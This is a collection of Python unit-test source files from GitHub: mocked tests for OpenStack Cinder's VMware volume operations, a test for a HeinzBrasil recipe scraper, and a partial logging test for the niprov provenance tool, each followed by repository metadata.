root = mock.Mock(spec=object)
root.name = 'root'
node = mock.Mock(spec=object)
node.name = snapshot_name
node.snapshot = snapshot
root.childSnapshotList = [node]
# Test rootSnapshotList is not None
snapshot_tree = mock.Mock(spec=object)
snapshot_tree.rootSnapshotList = [root]
self.session.invoke_api.return_value = snapshot_tree
backing = mock.sentinel.backing
ret = self.vops.get_snapshot(backing, snapshot_name)
self.assertEqual(snapshot, ret)
self.session.invoke_api.assert_called_with(vim_util,
'get_object_property',
self.session.vim,
backing,
'snapshot')
# Test rootSnapshotList == None
snapshot_tree.rootSnapshotList = None
ret = self.vops.get_snapshot(backing, snapshot_name)
self.assertIsNone(ret)
self.session.invoke_api.assert_called_with(vim_util,
'get_object_property',
self.session.vim,
backing,
'snapshot')
def test_snapshot_exists(self):
backing = mock.sentinel.backing
invoke_api = self.session.invoke_api
invoke_api.return_value = None
self.assertFalse(self.vops.snapshot_exists(backing))
invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
backing,
'snapshot')
snapshot = mock.Mock()
invoke_api.return_value = snapshot
snapshot.rootSnapshotList = None
self.assertFalse(self.vops.snapshot_exists(backing))
snapshot.rootSnapshotList = [mock.Mock()]
self.assertTrue(self.vops.snapshot_exists(backing))
def test_delete_snapshot(self):
backing = mock.sentinel.backing
snapshot_name = mock.sentinel.snapshot_name
# Test snapshot is None
with mock.patch.object(self.vops, 'get_snapshot') as get_snapshot:
get_snapshot.return_value = None
self.vops.delete_snapshot(backing, snapshot_name)
get_snapshot.assert_called_once_with(backing, snapshot_name)
# Test snapshot is not None
snapshot = mock.sentinel.snapshot
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
with mock.patch.object(self.vops, 'get_snapshot') as get_snapshot:
get_snapshot.return_value = snapshot
self.vops.delete_snapshot(backing, snapshot_name)
get_snapshot.assert_called_with(backing, snapshot_name)
invoke_api.assert_called_once_with(self.session.vim,
'RemoveSnapshot_Task',
snapshot, removeChildren=False)
self.session.wait_for_task.assert_called_once_with(task)
def test_get_folder(self):
folder = mock.sentinel.folder
backing = mock.sentinel.backing
with mock.patch.object(self.vops, '_get_parent') as get_parent:
get_parent.return_value = folder
ret = self.vops._get_folder(backing)
self.assertEqual(folder, ret)
get_parent.assert_called_once_with(backing, 'Folder')
def _verify_extra_config(self, option_values, key, value):
self.assertEqual(1, len(option_values))
self.assertEqual(key, option_values[0].key)
self.assertEqual(value, option_values[0].value)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_relocate_spec')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_disk_device')
def test_get_clone_spec(self, get_disk_device, get_relocate_spec):
factory = self.session.vim.client.factory
factory.create.side_effect = lambda *args: mock.Mock()
relocate_spec = mock.sentinel.relocate_spec
get_relocate_spec.return_value = relocate_spec
# Test with empty disk type.
datastore = mock.sentinel.datastore
disk_move_type = mock.sentinel.disk_move_type
snapshot = mock.sentinel.snapshot
disk_type = None
backing = mock.sentinel.backing
host = mock.sentinel.host
rp = mock.sentinel.rp
key = mock.sentinel.key
value = mock.sentinel.value
extra_config = {key: value}
ret = self.vops._get_clone_spec(datastore, disk_move_type, snapshot,
backing, disk_type, host, rp,
extra_config)
self.assertEqual(relocate_spec, ret.location)
self.assertFalse(ret.powerOn)
self.assertFalse(ret.template)
self.assertEqual(snapshot, ret.snapshot)
get_relocate_spec.assert_called_once_with(datastore, rp, host,
disk_move_type, disk_type,
None)
self._verify_extra_config(ret.config.extraConfig, key, value)
# Test with non-empty disk type.
disk_device = mock.sentinel.disk_device
get_disk_device.return_value = disk_device
disk_type = 'thin'
ret = self.vops._get_clone_spec(datastore, disk_move_type, snapshot,
backing, disk_type, host, rp,
extra_config)
factory.create.side_effect = None
self.assertEqual(relocate_spec, ret.location)
self.assertFalse(ret.powerOn)
self.assertFalse(ret.template)
self.assertEqual(snapshot, ret.snapshot)
get_disk_device.assert_called_once_with(backing)
get_relocate_spec.assert_called_with(datastore, rp, host,
disk_move_type, disk_type,
disk_device)
self._verify_extra_config(ret.config.extraConfig, key, value)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_clone_spec')
def test_clone_backing(self, get_clone_spec):
folder = mock.Mock(name='folder', spec=object)
folder._type = 'Folder'
task = mock.sentinel.task
self.session.invoke_api.side_effect = [folder, task, folder, task,
folder, task]
task_info = mock.Mock(spec=object)
task_info.result = mock.sentinel.new_backing
self.session.wait_for_task.return_value = task_info
clone_spec = mock.sentinel.clone_spec
get_clone_spec.return_value = clone_spec
# Test non-linked clone_backing
name = mock.sentinel.name
backing = mock.Mock(spec=object)
backing._type = 'VirtualMachine'
snapshot = mock.sentinel.snapshot
clone_type = "anything-other-than-linked"
datastore = mock.sentinel.datstore
ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
datastore)
# verify calls
self.assertEqual(mock.sentinel.new_backing, ret)
disk_move_type = 'moveAllDiskBackingsAndDisallowSharing'
get_clone_spec.assert_called_with(
datastore, disk_move_type, snapshot, backing, None, host=None,
resource_pool=None, extra_config=None)
expected = [mock.call(vim_util, 'get_object_property',
self.session.vim, backing, 'parent'),
mock.call(self.session.vim, 'CloneVM_Task', backing,
folder=folder, name=name, spec=clone_spec)]
self.assertEqual(expected, self.session.invoke_api.mock_calls)
# Test linked clone_backing
clone_type = volumeops.LINKED_CLONE_TYPE
self.session.invoke_api.reset_mock()
ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
datastore)
# verify calls
self.assertEqual(mock.sentinel.new_backing, ret)
disk_move_type = 'createNewChildDiskBacking'
get_clone_spec.assert_called_with(
datastore, disk_move_type, snapshot, backing, None, host=None,
resource_pool=None, extra_config=None)
expected = [mock.call(vim_util, 'get_object_property',
self.session.vim, backing, 'parent'),
mock.call(self.session.vim, 'CloneVM_Task', backing,
folder=folder, name=name, spec=clone_spec)]
self.assertEqual(expected, self.session.invoke_api.mock_calls)
# Test with optional params (disk_type, host, resource_pool and
# extra_config).
clone_type = None
disk_type = 'thin'
host = mock.sentinel.host
rp = mock.sentinel.rp
extra_config = mock.sentinel.extra_config
self.session.invoke_api.reset_mock()
ret = self.vops.clone_backing(name, backing, snapshot, clone_type,
datastore, disk_type, host, rp,
extra_config)
self.assertEqual(mock.sentinel.new_backing, ret)
disk_move_type = 'moveAllDiskBackingsAndDisallowSharing'
get_clone_spec.assert_called_with(
datastore, disk_move_type, snapshot, backing, disk_type, host=host,
resource_pool=rp, extra_config=extra_config)
expected = [mock.call(vim_util, 'get_object_property',
self.session.vim, backing, 'parent'),
mock.call(self.session.vim, 'CloneVM_Task', backing,
folder=folder, name=name, spec=clone_spec)]
self.assertEqual(expected, self.session.invoke_api.mock_calls)
# Clear side effects.
self.session.invoke_api.side_effect = None
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_create_specs_for_disk_add')
def test_attach_disk_to_backing(self, create_spec):
reconfig_spec = mock.Mock()
self.session.vim.client.factory.create.return_value = reconfig_spec
disk_add_config_specs = mock.Mock()
create_spec.return_value = disk_add_config_specs
task = mock.Mock()
self.session.invoke_api.return_value = task
backing = mock.Mock()
size_in_kb = units.Ki
disk_type = "thin"
adapter_type = "ide"
vmdk_ds_file_path = mock.Mock()
self.vops.attach_disk_to_backing(backing, size_in_kb, disk_type,
adapter_type, vmdk_ds_file_path)
self.assertEqual(disk_add_config_specs, reconfig_spec.deviceChange)
create_spec.assert_called_once_with(size_in_kb, disk_type,
adapter_type,
vmdk_ds_file_path)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
self.session.wait_for_task.assert_called_once_with(task)
def test_rename_backing(self):
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
new_name = mock.sentinel.new_name
self.vops.rename_backing(backing, new_name)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"Rename_Task",
backing,
newName=new_name)
self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_disk_device')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_reconfigure_backing')
def test_update_backing_disk_uuid(self, reconfigure_backing,
get_disk_device):
disk_spec = mock.Mock()
reconfig_spec = mock.Mock()
self.session.vim.client.factory.create.side_effect = [disk_spec,
reconfig_spec]
disk_device = mock.Mock()
get_disk_device.return_value = disk_device
self.vops.update_backing_disk_uuid(mock.sentinel.backing,
mock.sentinel.disk_uuid)
get_disk_device.assert_called_once_with(mock.sentinel.backing)
self.assertEqual(mock.sentinel.disk_uuid, disk_device.backing.uuid)
self.assertEqual('edit', disk_spec.operation)
self.assertEqual(disk_device, disk_spec.device)
self.assertEqual([disk_spec], reconfig_spec.deviceChange)
reconfigure_backing.assert_called_once_with(mock.sentinel.backing,
reconfig_spec)
exp_factory_create_calls = [mock.call('ns0:VirtualDeviceConfigSpec'),
mock.call('ns0:VirtualMachineConfigSpec')]
self.assertEqual(exp_factory_create_calls,
self.session.vim.client.factory.create.call_args_list)
def test_change_backing_profile(self):
# Test change to empty profile.
reconfig_spec = mock.Mock()
empty_profile_spec = mock.sentinel.empty_profile_spec
self.session.vim.client.factory.create.side_effect = [
reconfig_spec, empty_profile_spec]
task = mock.sentinel.task
self.session.invoke_api.return_value = task
backing = mock.sentinel.backing
unique_profile_id = mock.sentinel.unique_profile_id
profile_id = mock.Mock(uniqueId=unique_profile_id)
self.vops.change_backing_profile(backing, profile_id)
self.assertEqual([empty_profile_spec], reconfig_spec.vmProfile)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
self.session.wait_for_task.assert_called_once_with(task)
# Test change to non-empty profile.
profile_spec = mock.Mock()
self.session.vim.client.factory.create.side_effect = [
reconfig_spec, profile_spec]
self.session.invoke_api.reset_mock()
self.session.wait_for_task.reset_mock()
self.vops.change_backing_profile(backing, profile_id)
self.assertEqual([profile_spec], reconfig_spec.vmProfile)
self.assertEqual(unique_profile_id,
reconfig_spec.vmProfile[0].profileId)
self.session.invoke_api.assert_called_once_with(self.session.vim,
"ReconfigVM_Task",
backing,
spec=reconfig_spec)
self.session.wait_for_task.assert_called_once_with(task)
# Clear side effects.
self.session.vim.client.factory.create.side_effect = None
def test_delete_file(self):
file_mgr = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_mgr
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
# Test delete file
file_path = mock.sentinel.file_path
datacenter = mock.sentinel.datacenter
self.vops.delete_file(file_path, datacenter)
# verify calls
invoke_api.assert_called_once_with(self.session.vim,
'DeleteDatastoreFile_Task',
file_mgr,
name=file_path,
datacenter=datacenter)
self.session.wait_for_task.assert_called_once_with(task)
def test_create_datastore_folder(self):
file_manager = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_manager
invoke_api = self.session.invoke_api
ds_name = "nfs"
folder_path = "test/"
datacenter = mock.sentinel.datacenter
self.vops.create_datastore_folder(ds_name, folder_path, datacenter)
invoke_api.assert_called_once_with(self.session.vim,
'MakeDirectory',
file_manager,
name="[nfs] test/",
datacenter=datacenter)
def test_create_datastore_folder_with_existing_folder(self):
file_manager = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_manager
invoke_api = self.session.invoke_api
invoke_api.side_effect = exceptions.FileAlreadyExistsException
ds_name = "nfs"
folder_path = "test/"
datacenter = mock.sentinel.datacenter
self.vops.create_datastore_folder(ds_name, folder_path, datacenter)
invoke_api.assert_called_once_with(self.session.vim,
'MakeDirectory',
file_manager,
name="[nfs] test/",
datacenter=datacenter)
invoke_api.side_effect = None
def test_create_datastore_folder_with_invoke_api_error(self):
file_manager = mock.sentinel.file_manager
self.session.vim.service_content.fileManager = file_manager
invoke_api = self.session.invoke_api
invoke_api.side_effect = exceptions.VimFaultException(
["FileFault"], "error")
ds_name = "nfs"
folder_path = "test/"
datacenter = mock.sentinel.datacenter
self.assertRaises(exceptions.VimFaultException,
self.vops.create_datastore_folder,
ds_name,
folder_path,
datacenter)
invoke_api.assert_called_once_with(self.session.vim,
'MakeDirectory',
file_manager,
name="[nfs] test/",
datacenter=datacenter)
invoke_api.side_effect = None
def test_get_path_name(self):
path = mock.Mock(spec=object)
path_name = mock.sentinel.vm_path_name
path.vmPathName = path_name
invoke_api = self.session.invoke_api
invoke_api.return_value = path
backing = mock.sentinel.backing
ret = self.vops.get_path_name(backing)
self.assertEqual(path_name, ret)
invoke_api.assert_called_once_with(vim_util, 'get_object_property',
self.session.vim, backing,
'config.files')
def test_get_entity_name(self):
entity_name = mock.sentinel.entity_name
invoke_api = self.session.invoke_api
invoke_api.return_value = entity_name
entity = mock.sentinel.entity
ret = self.vops.get_entity_name(entity)
self.assertEqual(entity_name, ret)
invoke_api.assert_called_once_with(vim_util, 'get_object_property',
self.session.vim, entity, 'name')
def test_get_vmdk_path(self):
# Setup hardware_devices for test
device = mock.Mock()
device.__class__.__name__ = 'VirtualDisk'
backing = mock.Mock()
backing.__class__.__name__ = 'VirtualDiskFlatVer2BackingInfo'
backing.fileName = mock.sentinel.vmdk_path
device.backing = backing
invoke_api = self.session.invoke_api
invoke_api.return_value = [device]
# Test get_vmdk_path
ret = self.vops.get_vmdk_path(backing)
self.assertEqual(mock.sentinel.vmdk_path, ret)
invoke_api.assert_called_once_with(vim_util, 'get_object_property',
self.session.vim, backing,
'config.hardware.device')
backing.__class__.__name__ = ' VirtualDiskSparseVer2BackingInfo'
self.assertRaises(AssertionError, self.vops.get_vmdk_path, backing)
# Test with no disk device.
invoke_api.return_value = []
self.assertRaises(vmdk_exceptions.VirtualDiskNotFoundException,
self.vops.get_vmdk_path,
backing)
def test_get_disk_size(self):
# Test with valid disk device.
device = mock.Mock()
device.__class__.__name__ = 'VirtualDisk'
disk_size_bytes = 1024
device.capacityInKB = disk_size_bytes / units.Ki
invoke_api = self.session.invoke_api
invoke_api.return_value = [device]
self.assertEqual(disk_size_bytes,
self.vops.get_disk_size(mock.sentinel.backing))
# Test with no disk device.
invoke_api.return_value = []
self.assertRaises(vmdk_exceptions.VirtualDiskNotFoundException,
self.vops.get_disk_size,
mock.sentinel.backing)
def test_create_virtual_disk(self):
task = mock.Mock()
invoke_api = self.session.invoke_api
invoke_api.return_value = task
spec = mock.Mock()
factory = self.session.vim.client.factory
factory.create.return_value = spec
disk_mgr = self.session.vim.service_content.virtualDiskManager
dc_ref = mock.Mock()
vmdk_ds_file_path = mock.Mock()
size_in_kb = 1024
adapter_type = 'ide'
disk_type = 'thick'
self.vops.create_virtual_disk(dc_ref, vmdk_ds_file_path, size_in_kb,
adapter_type, disk_type)
self.assertEqual(volumeops.VirtualDiskAdapterType.IDE,
spec.adapterType)
self.assertEqual(volumeops.VirtualDiskType.PREALLOCATED, spec.diskType)
self.assertEqual(size_in_kb, spec.capacityKb)
invoke_api.assert_called_once_with(self.session.vim,
'CreateVirtualDisk_Task',
disk_mgr,
name=vmdk_ds_file_path,
datacenter=dc_ref,
spec=spec)
self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'create_virtual_disk')
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'delete_file')
def test_create_flat_extent_virtual_disk_descriptor(self, delete_file,
create_virtual_disk):
dc_ref = mock.Mock()
path = mock.Mock()
size_in_kb = 1024
adapter_type = 'ide'
disk_type = 'thick'
self.vops.create_flat_extent_virtual_disk_descriptor(dc_ref,
path,
size_in_kb,
adapter_type,
disk_type)
create_virtual_disk.assert_called_once_with(
dc_ref, path.get_descriptor_ds_file_path(), size_in_kb,
adapter_type, disk_type)
delete_file.assert_called_once_with(
path.get_flat_extent_ds_file_path(), dc_ref)
def test_copy_vmdk_file(self):
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
src_dc_ref = mock.sentinel.src_dc_ref
src_vmdk_file_path = mock.sentinel.src_vmdk_file_path
dest_dc_ref = mock.sentinel.dest_dc_ref
dest_vmdk_file_path = mock.sentinel.dest_vmdk_file_path
self.vops.copy_vmdk_file(src_dc_ref, src_vmdk_file_path,
dest_vmdk_file_path, dest_dc_ref)
invoke_api.assert_called_once_with(self.session.vim,
'CopyVirtualDisk_Task',
disk_mgr,
sourceName=src_vmdk_file_path,
sourceDatacenter=src_dc_ref,
destName=dest_vmdk_file_path,
destDatacenter=dest_dc_ref,
force=True)
self.session.wait_for_task.assert_called_once_with(task)
def test_copy_vmdk_file_with_default_dest_datacenter(self):
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
src_dc_ref = mock.sentinel.src_dc_ref
src_vmdk_file_path = mock.sentinel.src_vmdk_file_path
dest_vmdk_file_path = mock.sentinel.dest_vmdk_file_path
self.vops.copy_vmdk_file(src_dc_ref, src_vmdk_file_path,
dest_vmdk_file_path)
invoke_api.assert_called_once_with(self.session.vim,
'CopyVirtualDisk_Task',
disk_mgr,
sourceName=src_vmdk_file_path,
sourceDatacenter=src_dc_ref,
destName=dest_vmdk_file_path,
destDatacenter=src_dc_ref,
force=True)
self.session.wait_for_task.assert_called_once_with(task)
def test_delete_vmdk_file(self):
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
dc_ref = self.session.dc_ref
vmdk_file_path = self.session.vmdk_file
self.vops.delete_vmdk_file(vmdk_file_path, dc_ref)
invoke_api.assert_called_once_with(self.session.vim,
'DeleteVirtualDisk_Task',
disk_mgr,
name=vmdk_file_path,
datacenter=dc_ref)
self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('oslo_vmware.pbm.get_profiles_by_ids')
@mock.patch('oslo_vmware.pbm.get_profiles')
def test_get_profile(self, get_profiles, get_profiles_by_ids):
profile_ids = [mock.sentinel.profile_id]
get_profiles.return_value = profile_ids
profile_name = mock.sentinel.profile_name
profile = mock.Mock()
profile.name = profile_name
get_profiles_by_ids.return_value = [profile]
backing = mock.sentinel.backing
self.assertEqual(profile_name, self.vops.get_profile(backing))
get_profiles.assert_called_once_with(self.session, backing)
get_profiles_by_ids.assert_called_once_with(self.session, profile_ids)
@mock.patch('oslo_vmware.pbm.get_profiles_by_ids')
@mock.patch('oslo_vmware.pbm.get_profiles')
def test_get_profile_with_no_profile(self, get_profiles,
get_profiles_by_ids):
get_profiles.return_value = []
backing = mock.sentinel.backing
self.assertIsNone(self.vops.get_profile(backing))
get_profiles.assert_called_once_with(self.session, backing)
self.assertFalse(get_profiles_by_ids.called)
def test_extend_virtual_disk(self):
"""Test volumeops.extend_virtual_disk."""
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
fake_size = 5
fake_size_in_kb = fake_size * units.Mi
fake_name = 'fake_volume_0000000001'
fake_dc = mock.sentinel.datacenter
self.vops.extend_virtual_disk(fake_size,
fake_name, fake_dc)
invoke_api.assert_called_once_with(self.session.vim,
"ExtendVirtualDisk_Task",
disk_mgr,
name=fake_name,
datacenter=fake_dc,
newCapacityKb=fake_size_in_kb,
eagerZero=False)
self.session.wait_for_task.assert_called_once_with(task)
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_all_clusters')
def test_get_cluster_refs(self, get_all_clusters):
cls_1 = mock.sentinel.cls_1
cls_2 = mock.sentinel.cls_2
clusters = {"cls_1": cls_1, "cls_2": cls_2}
get_all_clusters.return_value = clusters
self.assertEqual({"cls_2": cls_2},
self.vops.get_cluster_refs(["cls_2"]))
@mock.patch('cinder.volume.drivers.vmware.volumeops.VMwareVolumeOps.'
'_get_all_clusters')
def test_get_cluster_refs_with_invalid_cluster(self, get_all_clusters):
cls_1 = mock.sentinel.cls_1
cls_2 = mock.sentinel.cls_2
clusters = {"cls_1": cls_1, "cls_2": cls_2}
get_all_clusters.return_value = clusters
self.assertRaises(vmdk_exceptions.ClusterNotFoundException,
self.vops.get_cluster_refs,
["cls_1", "cls_3"])
def test_get_cluster_hosts(self):
host_1 = mock.sentinel.host_1
host_2 = mock.sentinel.host_2
hosts = mock.Mock(ManagedObjectReference=[host_1, host_2])
self.session.invoke_api.return_value = hosts
cluster = mock.sentinel.cluster
ret = self.vops.get_cluster_hosts(cluster)
self.assertEqual([host_1, host_2], ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
cluster,
'host')
def test_get_cluster_hosts_with_no_host(self):
self.session.invoke_api.return_value = None
cluster = mock.sentinel.cluster
ret = self.vops.get_cluster_hosts(cluster)
self.assertEqual([], ret)
self.session.invoke_api.assert_called_once_with(vim_util,
'get_object_property',
self.session.vim,
cluster,
'host')
class VirtualDiskPathTest(test.TestCase):
"""Unit tests for VirtualDiskPath."""
def setUp(self):
super(VirtualDiskPathTest, self).setUp()
self._path = volumeops.VirtualDiskPath("nfs", "A/B/", "disk")
def test_get_datastore_file_path(self):
self.assertEqual("[nfs] A/B/disk.vmdk",
self._path.get_datastore_file_path("nfs",
"A/B/disk.vmdk"))
def test_get_descriptor_file_path(self):
self.assertEqual("A/B/disk.vmdk",
self._path.get_descriptor_file_path())
def test_get_descriptor_ds_file_path(self):
self.assertEqual("[nfs] A/B/disk.vmdk",
self._path.get_descriptor_ds_file_path())
class FlatExtentVirtualDiskPathTest(test.TestCase):
"""Unit tests for FlatExtentVirtualDiskPath."""
def setUp(self):
super(FlatExtentVirtualDiskPathTest, self).setUp()
self._path = volumeops.FlatExtentVirtualDiskPath("nfs", "A/B/", "disk")
def test_get_flat_extent_file_path(self):
self.assertEqual("A/B/disk-flat.vmdk",
self._path.get_flat_extent_file_path())
def test_get_flat_extent_ds_file_path(self):
self.assertEqual("[nfs] A/B/disk-flat.vmdk",
self._path.get_flat_extent_ds_file_path())
class VirtualDiskTypeTest(test.TestCase):
"""Unit tests for VirtualDiskType."""
def test_is_valid(self):
self.assertTrue(volumeops.VirtualDiskType.is_valid("thick"))
self.assertTrue(volumeops.VirtualDiskType.is_valid("thin"))
self.assertTrue(volumeops.VirtualDiskType.is_valid("eagerZeroedThick"))
self.assertFalse(volumeops.VirtualDiskType.is_valid("preallocated"))
def test_validate(self):
volumeops.VirtualDiskType.validate("thick")
volumeops.VirtualDiskType.validate("thin")
volumeops.VirtualDiskType.validate("eagerZeroedThick")
self.assertRaises(vmdk_exceptions.InvalidDiskTypeException,
volumeops.VirtualDiskType.validate,
"preallocated")
def test_get_virtual_disk_type(self):
self.assertEqual("preallocated",
volumeops.VirtualDiskType.get_virtual_disk_type(
"thick"))
self.assertEqual("thin",
volumeops.VirtualDiskType.get_virtual_disk_type(
"thin"))
self.assertEqual("eagerZeroedThick",
volumeops.VirtualDiskType.get_virtual_disk_type(
"eagerZeroedThick"))
self.assertRaises(vmdk_exceptions.InvalidDiskTypeException,
volumeops.VirtualDiskType.get_virtual_disk_type,
"preallocated")
class VirtualDiskAdapterTypeTest(test.TestCase):
"""Unit tests for VirtualDiskAdapterType."""
def test_is_valid(self):
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid("lsiLogic"))
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid("busLogic"))
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid(
"lsiLogicsas"))
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid("ide"))
self.assertFalse(volumeops.VirtualDiskAdapterType.is_valid("pvscsi"))
def test_validate(self):
volumeops.VirtualDiskAdapterType.validate("lsiLogic")
volumeops.VirtualDiskAdapterType.validate("busLogic")
volumeops.VirtualDiskAdapterType.validate("lsiLogicsas")
volumeops.VirtualDiskAdapterType.validate("ide")
self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
volumeops.VirtualDiskAdapterType.validate,
"pvscsi")
def test_get_adapter_type(self):
self.assertEqual("lsiLogic",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"lsiLogic"))
self.assertEqual("busLogic",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"busLogic"))
self.assertEqual("lsiLogic",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"lsiLogicsas"))
self.assertEqual("ide",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"ide"))
self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
volumeops.VirtualDiskAdapterType.get_adapter_type,
"pvscsi")
class ControllerTypeTest(test.TestCase):
"""Unit tests for ControllerType."""
def test_get_controller_type(self):
self.assertEqual(volumeops.ControllerType.LSI_LOGIC,
volumeops.ControllerType.get_controller_type(
'lsiLogic'))
self.assertEqual(volumeops.ControllerType.BUS_LOGIC,
volumeops.ControllerType.get_controller_type(
'busLogic'))
self.assertEqual(volumeops.ControllerType.LSI_LOGIC_SAS,
volumeops.ControllerType.get_controller_type(
'lsiLogicsas'))
self.assertEqual(volumeops.ControllerType.IDE,
volumeops.ControllerType.get_controller_type(
'ide'))
self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
volumeops.ControllerType.get_controller_type,
'invalid_type')
def test_is_scsi_controller(self):
self.assertTrue(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.LSI_LOGIC))
self.assertTrue(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.BUS_LOGIC))
self.assertTrue(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.LSI_LOGIC_SAS))
self.assertFalse(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.IDE))
| {
"content_hash": "4634b08d74b59a054333b728afbdef40",
"timestamp": "",
"source": "github",
"line_count": 1754,
"max_line_length": 79,
"avg_line_length": 45.754275940706954,
"alnum_prop": 0.5506834635465341,
"repo_name": "petrutlucian94/cinder",
"id": "fbad28415361013b189c9b2015dd1d31c30d7ca6",
"size": "80885",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cinder/tests/unit/test_vmware_volumeops.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "12246766"
},
{
"name": "Shell",
"bytes": "8111"
}
],
"symlink_target": ""
} |
from recipe_scrapers.heinzbrasil import HeinzBrasil
from tests import ScraperTest
class TestHeinzBrasilScraper(ScraperTest):
scraper_class = HeinzBrasil
def test_host(self):
self.assertEqual("heinzbrasil.com.br", self.harvester_class.host())
def test_canonical_url(self):
self.assertEqual(
"https://www.heinzbrasil.com.br/recipe/100149100002/chili-com-carne",
self.harvester_class.canonical_url(),
)
def test_title(self):
self.assertEqual(self.harvester_class.title(), "Chili com carne")
def test_image(self):
self.assertEqual(
"//d36rz30b5p7lsd.cloudfront.net/heinzbrasilbr/recipes/img/1e1fccb2d38d8b3e3611aa5c99706523.jpeg",
self.harvester_class.image(),
)
def test_ingredients(self):
self.assertCountEqual(
[
"1 kg de carne moída",
"1 cebola picada",
"1 pimentão vermelho cortado em cubos",
"1 pimentão verde cortado em cubos",
"100 g de manteiga",
"50 ml azeite",
"20 g de especiarias mexicanas (pimentão, cominho, coentro...)",
"100 ml de café forte",
"150 g de milho crocante, escorrido",
"200 g de feijão lavado e escorrido (feijão vermelho da América do Sul)",
"2 tomates grandes cortados em cubos",
"400 ml de Ketchup Heinz",
"200 g de queijo gruyère ralado fininho",
],
self.harvester_class.ingredients(),
)
def test_instructions(self):
self.assertEqual(
"Frite a carne, a cebola e os pimentões na manteiga com o azeite, mexendo bem. Despeje as especiarias mexicanas e o café. Adicione o milho, o feijão, os tomates picados e o Ketchup Heinz. Cozinhe por 5 minutos. Sirva com um bom pedaço de pão e gruyère.",
self.harvester_class.instructions(),
)
| {
"content_hash": "cf99579a91baafe48b55892d97f186ce",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 266,
"avg_line_length": 39.05882352941177,
"alnum_prop": 0.6049196787148594,
"repo_name": "hhursev/recipe-scraper",
"id": "81978a680f51016769e63f76e6e08e24deaebc08",
"size": "2007",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/test_heinzbrasil.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "88554"
}
],
"symlink_target": ""
} |
from mock import Mock, patch
from datetime import datetime as dt
from tests.ditest import DependencyInjectionTestBase
class LoggingTests(DependencyInjectionTestBase):
def setUp(self):
super(LoggingTests, self).setUp()
#self.repo.byLocation.return_value = True
self.opts = Mock()
self.opts.dryrun = False
img = Mock()
img.provenance = {'acquired':dt.now(),
'subject':'JD',
'protocol':'X',
'technique':'abc',
'repetition-time':1.0,
'epi-factor':1.0,
'magnetization-transfer-contrast':True,
'diffusion':True,
'echo-time':123,
'flip-angle':892,
'inversion-time':123}
self.locationFactory.completeString.side_effect = lambda p: p
self.repo.byLocation.return_value = img
self.provenancesAdded = []
def wrapProv(location, transient=False, provenance=False, dependencies=None):
self.provenancesAdded.append(provenance)
self.newimg = Mock()
self.newimg.provenance = {'parentfield':location}
return self.newimg
self.dependencies.reconfigureOrGetConfiguration.return_value = self.opts
patcher = patch('niprov.plogging.add')
self.add = patcher.start()
self.add.side_effect = wrapProv
self.addCleanup(patcher.stop)
def log(self, *args, **kwargs):
import niprov.plogging
with patch('niprov.plogging.inheritFrom') as self.inheritFrom:
self.inheritFrom.side_effect = lambda p, p2: p
return niprov.plogging.log(*args, dependencies=self.dependencies, opts=self.opts,
**kwargs)
def test_Returns_img(self):
parents = ['/p/f1']
new = '/p/f2'
trans = 'Something cool'
out = self.log(new, trans, parents)
self.assertEqual(out, self.newimg)
